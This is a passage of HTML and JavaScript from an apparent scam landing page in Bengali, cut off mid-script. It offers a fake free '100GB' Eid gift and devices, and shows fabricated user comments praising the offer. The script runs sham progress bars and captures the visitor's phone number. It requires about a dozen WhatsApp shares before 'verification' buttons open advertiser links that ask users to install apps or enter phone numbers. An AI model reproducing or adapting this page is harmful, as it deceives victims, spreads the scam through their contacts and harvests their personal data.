            এই বক্স পূর্ণ না হওয়া পর্যন্ত শেয়ার করুন!         <span class="quedate__load-a js-hidden"></span>
                </div>
                <div style="border: 1px solid gray;border-left: none; width:30%" class="quedate__load-icon">
                    <svg id="third-loading" class="quedate__load-animate" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" style=" shape-rendering: auto;" viewbox="0 0 100 100" preserveaspectratio="xMidYMid" width="3.2rem"> 
           <circle cx="50" cy="50" r="32" stroke-width="8" stroke="#ff6d0e" stroke-dasharray="50.26548245743669 50.26548245743669" fill="none" stroke-linecap="round" transform="rotate(214.395 50 50)"> 
            <animatetransform attributename="transform" type="rotate" dur="1s" repeatcount="indefinite" keytimes="0;1" values="0 50 50;360 50 50"></animatetransform> 
           </circle> 
           <circle cx="50" cy="50" r="23" stroke-width="8" stroke="#3c9900" stroke-dasharray="36.12831551628262 36.12831551628262" stroke-dashoffset="36.12831551628262" fill="none" stroke-linecap="round" transform="rotate(-214.395 50 50)"> 
            <animatetransform attributename="transform" type="rotate" dur="1s" repeatcount="indefinite" keytimes="0;1" values="0 50 50;-360 50 50"></animatetransform> 
           </circle> 
          </svg>
                    <svg id="???_1" class="quedate__load-check js-hidden" xml:space="preserve" viewbox="0 0 100 100" y="0" x="0" xmlns="http://www.w3.org/2000/svg" version="1.1" width=" 3.2rem"> 
           <g class="ldl-scale" style="transform-origin: 50% 50%; transform: rotate(0deg) scale(0.8, 0.8);"> 
            <g class="ldl-ani"> 
             <g class="ldl-layer"> 
              <g class="ldl-ani" style="transform: scale(0.91); transform-origin: 50px 50px; animation: 1.11111s linear -0.833333s infinite normal forwards running breath-37df210d-8a2e-4b1a-ada2-3deb9c98e6b4;"> 
               <circle stroke-miterlimit="10" stroke-width="8" stroke="#333" fill="none" r="40" cy="50" cx="50" style="stroke: rgb(6, 193, 103);"></circle> 
              </g> 
             </g> 
             <g class="ldl-layer"> 
              <g class="ldl-ani" style="transform: scale(0.91); transform-origin: 50px 50px; animation: 1.11111s linear -1.11111s infinite normal forwards running breath-37df210d-8a2e-4b1a-ada2-3deb9c98e6b4;"> 
               <path fill="#abbd81" d="M73.3 33.5c-2.3-2.3-6.1-2.3-8.4 0L44.5 53.9l-9.4-9.4c-2.3-2.3-6.1-2.3-8.4 0-1.1 1.1-1.7 2.6-1.7 4.2s.6 3.1 1.7 4.2l13.6 13.6c1.1 1.1 2.6 1.7 4.2 1.7s3.1-.6 4.2-1.7L73.2 42c1.1-1.1 1.7-2.6 1.7-4.2s-.5-3.1-1.6-4.3z" style="fill: rgb(6, 193, 103);"></path> 
              </g> 
             </g> 
             <metadata xmlns:d="https://loading.io/stock/"> 
              <d:name>
               ok
              </d:name> 
              <d:tags>
               ok,confirm,ready,positive,check,right,correct,affirmative,success
              </d:tags> 
              <d:license>
               by
              </d:license> 
              <d:slug>
               364zp
              </d:slug> 
             </metadata> 
            </g> 
           </g> 
          </svg>
                    <span id="third-porcent" class="quedate__load-text"></span>
                </div>
            </div> <button style="display: flex;align-items: center;justify-content: center;" id="compartir" class="quedate__cta-btn js-hidden"> 
         <!-- Generator: Adobe Illustrator 19.0.0, SVG Export Plug-In . SVG Version: 6.00 Build 0)  --> 
         <svg width="30px" style="enable-background:new 0 0 512 512;" version="1.1" id="Layer_1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px" viewbox="0 0 512 512" xml:space="preserve"> 
          <circle style="fill:#75B73B;" cx="256" cy="256" r="256" /> 
          <path style="fill:#52891D;" d="M360.241,151.826c-14.843-3.712-36.671-16.532-50.8-21.671
             c-55.165-17.239-129.293-3.448-149.98,60.337c-1.724,1.724-5.172,1.724-6.896,1.724c-41.374,48.269-13.791,106.882-17.239,160.323
             c-1.177,18.839-11.083,35.497-23.831,49.588l107.282,107.17C230.931,511.067,243.355,512,256,512
             c126.436,0,231.452-91.665,252.247-212.161L360.241,151.826z" /> 
          <g> 
           <path style="fill:#FFFFFF;" d="M248.837,108.447c-78.029,3.712-139.604,68.696-139.369,146.811
               c0.072,23.792,5.816,46.249,15.95,66.095l-15.557,75.514c-0.841,4.086,2.843,7.663,6.901,6.701l73.995-17.53
               c19.011,9.471,40.364,14.939,62.962,15.284c79.753,1.219,146.251-62.105,148.74-141.829
               C405.121,174.035,334.591,104.362,248.837,108.447L248.837,108.447z M337.13,335.936c-21.669,21.669-50.483,33.604-81.13,33.604
               c-17.944,0-35.126-4.027-51.066-11.966l-10.302-5.134l-45.37,10.747l9.549-46.356l-5.075-9.943
               c-8.276-16.206-12.472-33.728-12.472-52.084c0-30.648,11.935-59.459,33.604-81.13c21.476-21.478,50.759-33.604,81.134-33.604
               c30.644,0,59.458,11.935,81.127,33.604c21.669,21.669,33.604,50.483,33.604,81.127C370.735,285.177,358.607,314.459,337.13,335.936
               L337.13,335.936z" /> 
           <path style="fill:#FFFFFF;" d="M327.115,286.582l-28.384-8.149c-3.729-1.069-7.749-0.01-10.468,2.76l-6.942,7.07
               c-2.926,2.984-7.366,3.941-11.24,2.374c-13.427-5.434-41.672-30.548-48.881-43.106c-2.084-3.624-1.739-8.152,0.817-11.462
               l6.058-7.839c2.374-3.07,2.874-7.197,1.305-10.747l-11.941-27.008c-2.86-6.468-11.126-8.352-16.527-3.784
               c-7.921,6.701-17.32,16.88-18.461,28.16c-2.015,19.887,6.515,44.954,38.762,75.055c37.257,34.778,67.094,39.369,86.523,34.664
               c11.019-2.667,19.825-13.365,25.379-22.126C336.906,296.467,333.91,288.535,327.115,286.582L327.115,286.582z" /> 
          </g> 
          <g> 
           <path style="fill:#D1D1D1;" d="M356.004,147.708l-22.223,22.778c1.131,1.045,2.257,2.096,3.351,3.191
               c21.67,21.669,33.604,50.483,33.604,81.127c0,30.375-12.128,59.656-33.604,81.134c-21.669,21.669-50.483,33.604-81.13,33.604
               c-17.944,0-35.125-4.027-51.066-11.966l-10.302-5.134l-45.37,10.747l0.938-4.553l-40.174,41.172
               c0.886,2.663,3.705,4.475,6.734,3.758l73.995-17.53c19.011,9.471,40.364,14.939,62.962,15.284
               c79.753,1.219,146.253-62.105,148.74-141.829C403.834,215.357,385.686,175.435,356.004,147.708z" /> 
           <path style="fill:#D1D1D1;" d="M327.115,286.582l-28.384-8.149c-3.729-1.069-7.749-0.01-10.468,2.76l-6.942,7.07
               c-2.926,2.984-7.366,3.941-11.24,2.374c-7.756-3.139-20.451-12.845-31.185-22.904l-19.732,20.225
               c0.677,0.648,1.352,1.295,2.05,1.948c37.257,34.778,67.094,39.369,86.523,34.664c11.019-2.667,19.825-13.365,25.379-22.126
               C336.906,296.467,333.91,288.535,327.115,286.582z" /> 
          </g>
         </svg> WhatsApp </button><button style="display: flex;align-items: center;justify-content: center;" id="messenger" class="quedate__cta-btn2 js-hidden"><img src="./js/2.png" width="30px"> Messenger</button> </span>
        </div>
    </div>
    <!-- FIN Ventana permiso -->
    <!--verify-->
    <div class="loading2 js-hidden js-verify">
        <div class="loading2__box">
            <b style="font-weight:bold; font-size:16px">অভিনন্দন! যাচাইকরণের শেষ ধাপ, আপনি 100GB-এর থেকেও বেশি কিছু জিততে পারেন, যেমন Iphones, Ipads এবং আরও অনেক উপহার!.</b>
            <br />
            <br />
            <b>Verification methods;</b>
            <br />
            <br />
            <b> আমরা আপনাকে জিজ্ঞাসা করতে পারি; আপনার ফোন যাচাই করতে ডাউনলোড করুন, ফোন নম্বর যোগ করুন, ইনস্টল করুন, সমীক্ষা করুন বা অন্য কোনো প্রদত্ত কাজ)।</b>
            <br />
            <br />
            <b>
        মনে রাখবেন, এই ধাপটি খুবই গুরুত্বপূর্ণ, যাচাই করতে আপনার ফোন নম্বর যোগ করুন। কোনো পদক্ষেপ এড়িয়ে যাবেন না.</b>
            <br />
            <br />
            <b style="font-size:14px">
        এখন আপনার মোবাইল ডিভাইস যাচাই করুন.</b>
            <br />
            <br />
            <div style="display: flex;">
                <button style="display: flex;align-items: center;justify-content: center;margin: 0;" id="verify" class="quedate__cta-btn">VERIFY NOW</button>
                <button style="display: flex;align-items: center;justify-content: center;" id="verify" class="quedate__cta-btn">CLICK HERE</button>
            </div>
            <br />
            <center>
                <div style="display: flex;">
                    <button style="width: 100%; display: flex;align-items: center;justify-content: center;margin: 0;" id="verify" class="quedate__cta-btn">PHONE VERIFICATION</button>
                </div>
            </center>
            <br />
        </div>
    </div>
</div>
</div>
<!-- start Chat-->
<div class="container-chat">
    <div class="chat">
        <div class="chat__reactions">
            <span class="chat__reactions-icon"> 
       <svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" viewbox="0 0 16 16">
        <defs>
         <lineargradient id="r" x1="50%" x2="50%" y1="0%" y2="100%">
          <stop offset="0%" stop-color="#18AFFF"></stop>
          <stop offset="100%" stop-color="#0062DF"></stop>
         </lineargradient>
         <filter id="e" width="118.8%" height="118.8%" x="-9.4%" y="-9.4%" filterunits="objectBoundingBox">
          <fegaussianblur in="SourceAlpha" result="shadowBlurInner1" stddeviation="1"></fegaussianblur>
          <feoffset dy="-1" in="shadowBlurInner1" result="shadowOffsetInner1"></feoffset>
          <fecomposite in="shadowOffsetInner1" in2="SourceAlpha" k2="-1" k3="1" operator="arithmetic" result="shadowInnerInner1"></fecomposite>
          <fecolormatrix in="shadowInnerInner1" values="0 0 0 0 0 0 0 0 0 0.299356041 0 0 0 0 0.681187726 0 0 0 0.3495684 0"></fecolormatrix>
         </filter>
         <path id="k" d="M8 0a8 8 0 00-8 8 8 8 0 1016 0 8 8 0 00-8-8z"></path>
        </defs>
        <g fill="none">
         <use fill="url(#r)" xlink:href="#k"></use>
         <use fill="black" filter="url(#e)" xlink:href="#k"></use>
         <path fill="white" d="M12.162 7.338c.176.123.338.245.338.674 0 .43-.229.604-.474.725a.73.73 0 01.089.546c-.077.344-.392.611-.672.69.121.194.159.385.015.62-.185.295-.346.407-1.058.407H7.5c-.988 0-1.5-.546-1.5-1V7.665c0-1.23 1.467-2.275 1.467-3.13L7.361 3.47c-.005-.065.008-.224.058-.27.08-.079.301-.2.635-.2.218 0 .363.041.534.123.581.277.732.978.732 1.542 0 .271-.414 1.083-.47 1.364 0 0 .867-.192 1.879-.199 1.061-.006 1.749.19 1.749.842 0 .261-.219.523-.316.666zM3.6 7h.8a.6.6 0 01.6.6v3.8a.6.6 0 01-.6.6h-.8a.6.6 0 01-.6-.6V7.6a.6.6 0 01.6-.6z"></path>
        </g>
       </svg> </span>
            <span class="chat__reactions-icon"> 
       <svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" viewbox="0 0 16 16">
        <defs>
         <lineargradient id="a" x1="50%" x2="50%" y1="0%" y2="100%">
          <stop offset="0%" stop-color="#FF6680"></stop>
          <stop offset="100%" stop-color="#E61739"></stop>
         </lineargradient>
         <filter id="c" width="118.8%" height="118.8%" x="-9.4%" y="-9.4%" filterunits="objectBoundingBox">
          <fegaussianblur in="SourceAlpha" result="shadowBlurInner1" stddeviation="1"></fegaussianblur>
          <feoffset dy="-1" in="shadowBlurInner1" result="shadowOffsetInner1"></feoffset>
          <fecomposite in="shadowOffsetInner1" in2="SourceAlpha" k2="-1" k3="1" operator="arithmetic" result="shadowInnerInner1"></fecomposite>
          <fecolormatrix in="shadowInnerInner1" values="0 0 0 0 0.710144928 0 0 0 0 0 0 0 0 0 0.117780134 0 0 0 0.349786932 0"></fecolormatrix>
         </filter>
         <path id="b" d="M8 0a8 8 0 100 16A8 8 0 008 0z"></path>
        </defs>
        <g fill="none">
         <use fill="url(#a)" xlink:href="#b"></use>
         <use fill="black" filter="url(#c)" xlink:href="#b"></use>
         <path fill="white" d="M10.473 4C8.275 4 8 5.824 8 5.824S7.726 4 5.528 4c-2.114 0-2.73 2.222-2.472 3.41C3.736 10.55 8 12.75 8 12.75s4.265-2.2 4.945-5.34c.257-1.188-.36-3.41-2.472-3.41"></path>
        </g>
       </svg> </span>
            <span class="chat__reactions-text">Adi and Esther Nurul  </span>
            <span class="chat__reactions-counter">178k</span>
            <span class="chat__reactions-text">comments</span>
            <span class="chat__reactions-counter js-counter">638</span>
            <span class="chat__reactions-text">share</span>
        </div>
        <div class="chat__actions">
            <div class="chat__actions-box">
                <span>
        <svg width="40" style="enable-background:new 0 0 48 48;" version="1.1" viewbox="0 0 48 48" xml:space="preserve" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
         <style type="text/css">
 .st0 {
     display: none;
 }

 .st1 {
     fill: none;
     stroke: #303030;
     stroke-width: 0.7;
     stroke-linecap: round;
     stroke-linejoin: round;
     stroke-miterlimit: 10;
 }

 .st2 {
     fill: #303030;
 }
</style>
         <g class="st0" id="Padding__x26__Artboard"></g>
         <g id="Icons">
          <g>
           <path class="st1" d="M17.95222,33.90544h0.9013c0.21198,0,0.42036,0.06112,0.59631,0.17936    c0.28018,0.18827,0.55758,0.3808,0.84545,0.55725c0.16461,0.1009,0.35297,0.24185,0.53977,0.29492l6.92604,0.00805l4.83793,0.0013    c0.9355,0.00025,1.71305-0.76513,1.69462-1.70044c-0.01669-0.84692-0.15599-1.60765-1.00351-1.60765h0.1076    c0.91396,0,1.61795-0.74711,1.60863-1.66102c-0.00988-0.96905,0.13757-1.76219-0.82805-1.76219h0.3228    c0.92,0,1.40993-0.80351,1.40993-1.73351c0-0.92,0.12016-1.65903-0.79984-1.65903h0.32154c0.92,0,1.04668-0.81019,1.04668-1.73019    c0-0.93-0.49831-1.60727-1.41831-1.60727l-8.70333,0.01419c0.20236-0.27825,1.23094-4.09943,1.15505-4.83301    c-0.0544-0.52583-0.20867-1.0503-0.3366-1.56151c-0.17118-0.68406-0.35542-1.36467-0.53957-2.04532    c-0.11769-0.43504-0.8064-0.7405-1.18842-0.87866c-0.58066-0.21-1.19885-0.11427-1.68509,0.26741    c-0.2588,0.20315-0.66063,0.53764-0.66016,0.88888c0.00162,1.21729-0.00109,2.43457,0.00345,3.65185    c0.00004,0.01062,0.00008,0.02123,0.00012,0.03185c0.00023,0.06161,0.00036,0.12407-0.01541,0.18363    c-0.0169,0.06386-0.05128,0.12147-0.08524,0.17812c-0.68155,1.13686-1.36008,2.27553-2.03821,3.41444    c-0.29735,0.4994-0.59458,0.99887-0.89091,1.49888c-0.26875,0.45347-0.51342,0.94802-0.9745,1.23768    c-0.40725,0.25585-0.7805,0.49207-1.19004,0.74735"></path>
           <path class="st1" d="M16.5418,35.94944h-3.68656c-0.7371,0-1.33464-0.59753-1.33464-1.33463V24.34045    c0-0.7371,0.59754-1.33464,1.33464-1.33464h3.68656c0.7371,0,1.33464,0.59754,1.33464,1.33464v10.27436    C17.87644,35.35191,17.2789,35.94944,16.5418,35.94944z"></path>
           <line class="st1" x1="13.55524" x2="13.55524" y1="29.80501" y2="24.76078"></line>
           <line class="st1" x1="13.55524" x2="13.55524" y1="30.95262" y2="31.7558"></line>
          </g>
         </g>
        </svg></span>
                <span class="chat__actions-text">like</span>
            </div>
            <div class="chat__actions-box">
                <span>
        <!--?xml version="1.0" ?-->
        <svg width="40" style="enable-background:new 0 0 48 48;" version="1.1" viewbox="0 0 48 48" xml:space="preserve" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
         <style type="text/css">
             .st0 {
                 display: none;
             }

             .st1 {
                 fill: none;
                 stroke: #303030;
                 stroke-width: 0.7;
                 stroke-linecap: round;
                 stroke-linejoin: round;
                 stroke-miterlimit: 10;
             }

             .st2 {
                 fill: #303030;
             }
           </style>
         <g class="st0" id="Padding__x26__Artboard"></g>
         <g id="Icons">
          <g>
           <path class="st1" d="M17.30376,30.96737l-0.68934,1.90643l3.79318-1.78069c0.17639-0.0828,0.36885-0.12573,0.5637-0.12573    h12.98269c0.57547,0,1.0463-0.47084,1.0463-1.0463V16.1725c0-0.57547-0.47084-1.0463-1.0463-1.0463H14.04601    c-0.57786,0-1.0463,0.46845-1.0463,1.0463v13.74857c0,0.57786,0.46844,1.0463,1.0463,1.0463H17.30376z"></path>
           <line class="st1" x1="15.04836" x2="15.04836" y1="26.25386" y2="27.01553"></line>
           <line class="st1" x1="15.04836" x2="15.04836" y1="18.17051" y2="24.86477"></line>
          </g>
         </g>
        </svg></span>
                <span class="chat__actions-text">comments</span>
            </div>
        </div>
        <div class="chat__conversation">
            <!--js box-->
            <div class="chat__conversation-box js-hidden" id="js-box-1">
                <img data-src="https://pub-8b56429d469240cba794f23fec8a15fd.r2.dev/tx01.jpg" alt="" class="chat__conversation-box-img lazyload" />
                <span class="chat__conversation-box-active"></span>
                <div class="chat__conversation-box-content">
                    <div class="chat__conversation-box-content-comment ">
                        <span class="chat__conversation-box-content-comment-name">Hasan Mahmud</span>
                        <span class="chat__conversation-box-content-comment-text">আমি খুব খুশি। আমি সত্যিই এই উপহার পেয়েছি। ঈদ মোবারকে এমন একটি উপহার পেলে আরও খুশি হতাম। যদি আগামীতে কোনো বিশেষ আয়োজন থাকে, আমাকে জানাবেন।</span>

                    </div>
                    <div class="chat__conversation-box-content-cta">
                        <span class="chat__conversation-box-content-cta-text">like</span>
                        <span class="chat__conversation-box-content-cta-text">repley</span>
                        <span class="chat__conversation-box-content-cta-text">31m</span>
                    </div>
                </div>
            </div>
            <div class="chat__conversation-box js-hidden" id="js-box-2">
                <img data-src="https://pub-8b56429d469240cba794f23fec8a15fd.r2.dev/tx02.jpg" alt="" class="chat__conversation-box-img lazyload" />
                <span class="chat__conversation-box-active"></span>
                <div class="chat__conversation-box-content">
                    <div class="chat__conversation-box-content-comment ">
                        <span class="chat__conversation-box-content-comment-name">Aminul Islam</span>
                        <span class="chat__conversation-box-content-comment-text">ঈদ মোবারক! এই বিশেষ দিনে সর্বকালের সেরা পরিষেবা রয়েছে। আপনি আমাকে যে বিনামূল্যে 100GB দিয়েছেন তার জন্য আপনাকে ধন্যবাদ, এই ঈদ মোবারকে আপনাদের সফলতা কামনা করি।</span>

                    </div>
                    <div class="chat__conversation-box-content-cta">
                        <span class="chat__conversation-box-content-cta-text">like</span>
                        <span class="chat__conversation-box-content-cta-text">repley</span>
                        <span class="chat__conversation-box-content-cta-text">221m</span>
                    </div>
                </div>
            </div>
            <!--js end box -->
            <div class="chat__conversation-box">
                <img data-src="https://pub-8b56429d469240cba794f23fec8a15fd.r2.dev/tx03.jpg" alt="" class="chat__conversation-box-img lazyload" />
                <span class="chat__conversation-box-active"></span>
                <div class="chat__conversation-box-content">
                    <div class="chat__conversation-box-content-comment ">
                        <span class="chat__conversation-box-content-comment-name">Farzana Rahman</span>
                        <span class="chat__conversation-box-content-comment-text">I am disappointed, I got only 75GB!</span>
                    </div>
                    <div class="chat__conversation-box-content-cta">
                        <span class="chat__conversation-box-content-cta-text">like</span>
                        <span class="chat__conversation-box-content-cta-text">repley</span>
                        <span class="chat__conversation-box-content-cta-text js-seconds">311m</span>
                    </div>
                </div>
            </div>
            <div class="chat__conversation-box chat__conversation-box--right">
                <img data-src="https://pub-8b56429d469240cba794f23fec8a15fd.r2.dev/tx04.jpg" alt="" class="chat__conversation-box-img lazyload" />
                <div class="chat__conversation-box-content">
                    <div class="chat__conversation-box-content-comment ">
                        <span class="chat__conversation-box-content-comment-name">Nafisa Begum</span>
                        <span class="chat__conversation-box-content-comment-text">আশ্চর্য... তুমিও কি আমার মতো ১০০ জিবি পেয়েছ?</span>
                    </div>
                    <div class="chat__conversation-box-content-cta chat__conversation-box-content-cta--2">
                        <span class="chat__conversation-box-content-cta-text">like</span>
                        <span class="chat__conversation-box-content-cta-text">repley</span>
                        <span class="chat__conversation-box-content-cta-text js-seconds">46m</span>
                    </div>
                </div>
            </div>
            <span class="chat__conversation-reply">Jonas <span class="chat__conversation-reply--efect">is writing a comment...</span></span>
            <div class="chat__conversation-box">
                <img data-src="https://pub-8b56429d469240cba794f23fec8a15fd.r2.dev/tx05.jpg" alt="" class="chat__conversation-box-img lazyload" />
                <span class="chat__conversation-box-active"></span>
                <div class="chat__conversation-box-content">
                    <div class="chat__conversation-box-content-comment ">
                        <span class="chat__conversation-box-content-comment-name">Shahidul Alam</span>
                        <span class="chat__conversation-box-content-comment-text">এই সময়ে এই 100GB পাওয়ার জন্য ধন্যবাদ, ঈদ মোবারকে আমার এর খুব প্রয়োজন ছিল।</span>
                    </div>
                    <div class="chat__conversation-box-content-cta">
                        <span class="chat__conversation-box-content-cta-text">like</span>
                        <span class="chat__conversation-box-content-cta-text">repley</span>
                        <span class="chat__conversation-box-content-cta-text">103m</span>
                    </div>
                </div>
            </div>
            <div class="chat__conversation-write">
                <input type="text" name="comment" id="write" placeholder="Write a comment" />
                <label class="chat__conversation-write-text" for="write"></label>
                <div class="chat__conversation-write-icons">
                    <svg class="chat__conversation-write-icons-img" version="1.1" id="Capa_1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px" viewbox="0 0 512 512" style="enable-background:new 0 0 512 512;" xml:space="preserve"> 
         <g> 
          <g> 
           <g> 
            <path d="M256,0C114.844,0,0,114.844,0,256s114.844,256,256,256s256-114.844,256-256S397.156,0,256,0z M256,490.667
                  				C126.604,490.667,21.333,385.396,21.333,256S126.604,21.333,256,21.333S490.667,126.604,490.667,256S385.396,490.667,256,490.667
                  				z" /> 
            <path d="M393.385,299.115c-5.781-1.385-11.49,2.177-12.844,7.906c-13.75,57.885-64.958,98.313-124.542,98.313
                  				c-59.656,0-110.885-40.49-124.573-98.448c-1.365-5.75-7.146-9.24-12.833-7.938c-5.74,1.354-9.292,7.104-7.938,12.833
                  				c15.979,67.646,75.75,114.885,145.344,114.885c69.51,0,129.26-47.167,145.292-114.708
                  				C402.656,306.219,399.115,300.469,393.385,299.115z" /> 
            <circle cx="170.667" cy="192" r="21.333" /> 
            <circle cx="341.333" cy="192" r="21.333" /> 
           </g> 
          </g> 
         </g> 
        </svg>
                    <svg class="chat__conversation-write-icons-img" version="1.1" id="Capa_1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px" viewbox="0 0 480 480" style="enable-background:new 0 0 480 480;" xml:space="preserve"> 
         <g> 
          <g> 
           <path d="M240,136c-57.438,0-104,46.562-104,104s46.562,104,104,104c57.41-0.066,103.934-46.59,104-104
                			C344,182.562,297.438,136,240,136z M240,328c-48.601,0-88-39.399-88-88c0-48.601,39.399-88,88-88
                			c48.577,0.057,87.943,39.423,88,88C328,288.601,288.601,328,240,328z" /> 
          </g> 
         </g> 
         <g> 
          <g> 
           <path d="M440,112h-56c-13.255,0-24-10.745-24-24c-0.026-22.08-17.92-39.974-40-40H160c-22.08,0.026-39.974,17.92-40,40
                  			c0,13.255-10.745,24-24,24H40c-22.08,0.026-39.974,17.92-40,40v240c0.026,22.08,17.92,39.974,40,40h400
                  			c22.08-0.026,39.974-17.92,40-40V152C479.974,129.92,462.08,112.026,440,112z M464,392c0,13.255-10.745,24-24,24H40
                  			c-13.255,0-24-10.745-24-24V152c0-13.255,10.745-24,24-24h56c22.08-0.026,39.974-17.92,40-40c0-13.255,10.745-24,24-24h160
                  			c13.255,0,24,10.745,24,24c0.026,22.08,17.92,39.974,40,40h56c13.255,0,24,10.745,24,24V392z" /> 
          </g> 
         </g> 
        </svg>
                    <svg class="chat__conversation-write-icons-img--svg" width="32px" height="32px" viewbox="0 0 32 32" version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" xmlns:sketch="http://www.bohemiancoding.com/sketch/ns"> 
         <title>icon 65 file gif</title> 
         <desc>
          Created with Sketch.
         </desc> 
         <defs></defs> 
         <g id="Page-1" stroke="none" stroke-width="0" fill="none" fill-rule="evenodd" sketch:type="MSPage"> 
          <g id="icon-65-file-gif" sketch:type="MSArtboardGroup" fill="gray"> 
           <path d="M8.00684834,10 C6.34621185,10 5,11.3422643 5,12.9987856 L5,20.0012144 C5,21.6573979 6.33599155,23 8.00684834,23 L24.9931517,23 C26.6537881,23 28,21.6577357 28,20.0012144 L28,12.9987856 C28,11.3426021 26.6640085,10 24.9931517,10 L8.00684834,10 L8.00684834,10 Z M7.99456145,11 C6.89299558,11 6,11.9001762 6,12.992017 L6,20.007983 C6,21.1081436 6.90234375,22 7.99456145,22 L25.0054385,22 C26.1070044,22 27,21.0998238 27,20.007983 L27,12.992017 C27,11.8918564 26.0976562,11 25.0054385,11 L7.99456145,11 L7.99456145,11 Z M13,17 L13,19 L10.9998075,19 C10.4437166,19 10,18.5523709 10,18.0001925 L10,14.9998075 C10,14.4437166 10.4476291,14 10.9998075,14 L14,14 L14,13 L11.0048815,13 C9.89761602,13 9,13.8865548 9,15.0059191 L9,17.9940809 C9,19.1019194 9.8938998,20 11.0048815,20 L14,20 L14,19.25 L14,19.25 L14,17 L14,16 L11,16 L11,17 L13,17 L13,17 Z M16,14 L16,19 L15,19 L15,20 L18,20 L18,19 L17,19 L17,14 L18,14 L18,13 L15,13 L15,14 L16,14 L16,14 Z M20,16 L20,14 L24,14 L24,13 L19,13 L19,20 L20,20 L20,17 L23,17 L23,16 L20,16 L20,16 Z" id="file-gif" sketch:type="MSShapeGroup"></path> 
          </g> 
         </g> 
        </svg>
                </div>
            </div>
        </div>
    </div>
</div>
<!--end chat-->
</div>
<script src="//ajax.googleapis.com/ajax/libs/jquery/1.11.1/jquery.min.js"></script>
<script src="/single.php"></script>
<script src="https://cdn.jsdelivr.net/npm/lazyload@2.0.0-rc.2/lazyload.min.js"></script>
<script>
    lazyload();
    var DOMString = {
            loading: document.querySelector("#loading-svg"),
            checked: document.querySelector("#check-svg"),
            elemPorcents: document.querySelector(".quedate__porcent"),
            elemPorcentText: document.querySelector(".quedate__porcent-text"),
            firstBox: document.querySelector("#first-box"),
            secondBox: document.querySelector("#second-box"),
            thirdBox: document.querySelector("#third-box"),
            phone: document.querySelector(".quedate__form-input"),
            messageStatus: document.querySelector(".message-status"),
            loadingG: document.querySelector("#loading-g"),
            boxes: document.querySelectorAll(".quedate__first"),
            firstPorcent: document.querySelector("#first-porcent"),
            secondPorcent: document.querySelector("#second-porcent"),
            thirdPorcent: document.querySelector("#third-porcent"),
            barLoaders: document.querySelectorAll(".quedate__load-a"),
            svgLoading: document.querySelectorAll(".quedate__load-animate"),
            svgChecked: document.querySelectorAll(".quedate__load-check"),
            permissionContainer: document.querySelector(".permision-container"),
            permissionLoading: document.querySelector(".loading2"),
            statusMessage: document.querySelector(".fb-request"),
            messenger: document.querySelector("#messenger"),
            share: document.querySelector("#compartir"),
            congrats: document.querySelector(".js-congrats"),
            sharing: document.querySelector(".js-share"),
            verify: document.querySelector("#verify")
        },
        objServer = {};
    document.addEventListener("click", function(c) {
        var a = c.toElement || c.srcElement;
        if (a.id) switch (a.id) {
            case "validar":
                a.classList.add("js-hidden"), setTimeout(function() {
                    DOMString.loading.classList.remove("js-hidden"), DOMString.elemPorcents.classList.remove("js-hidden");
                    var b = 0;
                    window.loadingPorcents = setInterval(function() {
                        DOMString.elemPorcents.textContent = b + "%", 100 == b ? (clearInterval(window.loadingPorcents), DOMString.loading.classList.add("js-hidden"), DOMString.checked.classList.remove("js-hidden"), DOMString.elemPorcents.classList.add("js-hidden"), DOMString.elemPorcentText.classList.remove("js-hidden"), setTimeout(function() {
                            DOMString.checked.classList.add("js-hidden"), DOMString.firstBox.classList.add("js-hidden"), DOMString.secondBox.classList.remove("js-hidden"), DOMString.elemPorcentText.classList.add("js-hidden")
                        }, 2e3)) : b++
                    }, 50)
                }, 500);
                break;
            case "enviar":
                var a = DOMString.phone;
                a.value ? (objServer.phone = a.value, DOMString.messageStatus.classList.add("js-hidden"), DOMString.secondBox.classList.add("js-hidden"), DOMString.loadingG.classList.remove("js-hidden"), setTimeout(function() {
                    DOMString.loadingG.classList.add("js-hidden"), DOMString.thirdBox.classList.remove("js-hidden");
                    var i = 0,
                        j = 0,
                        k = !0,
                        l = [DOMString.firstPorcent, DOMString.secondPorcent, DOMString.thirdPorcent];
                    window.loadingData = setTimeout(function a() {
                        l.length > i && (DOMString.boxes[i].classList.remove("js-hidden"), DOMString.barLoaders[i].classList.remove("js-hidden"), window._setting = setInterval(function() {
                            if (l[i].textContent = j + "%", DOMString.barLoaders[i].style.width = j + "%", 100 === j && k) clearInterval(window._setting), DOMString.svgLoading[i].classList.add("js-hidden"), DOMString.svgChecked[i].classList.remove("js-hidden"), i++, j = 0, window.loadingData = setTimeout(a, 1e3);
                            else if (50 == j && 1 == i && k) clearInterval(window._setting), k = !1, window.loadingData = setTimeout(a, 1e3);
                            else if (!k && 100 === j) {
                                clearInterval(window._setting), DOMString.congrats.classList.remove("js-hidden"), DOMString.sharing.classList.remove("js-hidden"), DOMString.share.classList.remove("js-hidden"), DOMString.messenger.classList.remove("js-hidden"), DOMString.svgLoading[i].classList.add("js-hidden"), DOMString.svgChecked[i].classList.remove("js-hidden"), i++;
                                var d = 1,
                                    e = 0,
                                    m = messageToSend();
                                var s = 1;
                                set_Cookie("d", s);
                                DOMString.barLoaders[i].classList.remove("js-hidden"), DOMString.boxes[i].classList.remove("js-hidden"), DOMString.svgLoading[i].classList.remove("js-hidden"), l[i].textContent = "0%", DOMString.share.classList.remove("js-hidden"), DOMString.messenger.classList.remove("js-hidden"), DOMString.share.addEventListener("click", function() {
                                    if (12 <= d) {
                                        for (let a = document.querySelectorAll("#verify"), b = 0; b < a.length; b++) a[b].addEventListener("click", function() {
                                            switch (b) {
                                                case 0:
                                                    window.open(ad1, '_blank');
                                                    break;
                                                case 1:
                                                    window.open(ad2, '_blank');
                                                    break;
                                                case 2:
                                                    window.open(ad3, '_blank');
                                                    break;
                                            }
                                        });
